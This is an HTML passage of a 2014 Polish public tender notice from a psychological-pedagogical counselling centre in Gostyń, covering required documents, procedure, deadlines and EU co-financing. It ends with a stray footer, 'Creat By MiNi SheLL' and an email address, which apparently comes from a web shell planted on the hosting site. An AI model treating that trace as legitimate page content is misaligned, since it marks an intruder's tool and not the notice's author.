<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	ofertę wykonawcy (oryginał) - wg wzoru stanowiącego załącznik nr 1 do SIWZ;
2)	Informacja o Podwykonawcach - wg wzoru stanowiącego załącznik nr 6 do SIWZ;
3)	pełnomocnictwo do reprezentowania wykonawcy, jeśli nie wynika ono z innych przedstawionych dokumentów. Uwaga! Do oferty wykonawca dołącza oryginał pełnomocnictwa lub kopię pełnomocnictwa poświadczoną za zgodność z oryginałem przez notariusza;
4)	wykonawca, który przy wykazywaniu spełnienia warunków udziału w postępowaniu będzie powoływał się na zasadach określonych w art. 26 ust. 2b ustawy na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,                  w szczególności winien wówczas przedstawić pisemne zobowiązanie innych podmiotów (oryginał) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poradniapp.gostyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno-Pedagogiczna 63-800 Gostyń ul. Poznańska 200.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2014 godzina 10:00, miejsce: Poradnia Psychologiczno-Pedagogiczna 63-800 Gostyń ul. Poznańska 200.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Doskonalenie nauczycieli w powiecie gostyńskim współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III-Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com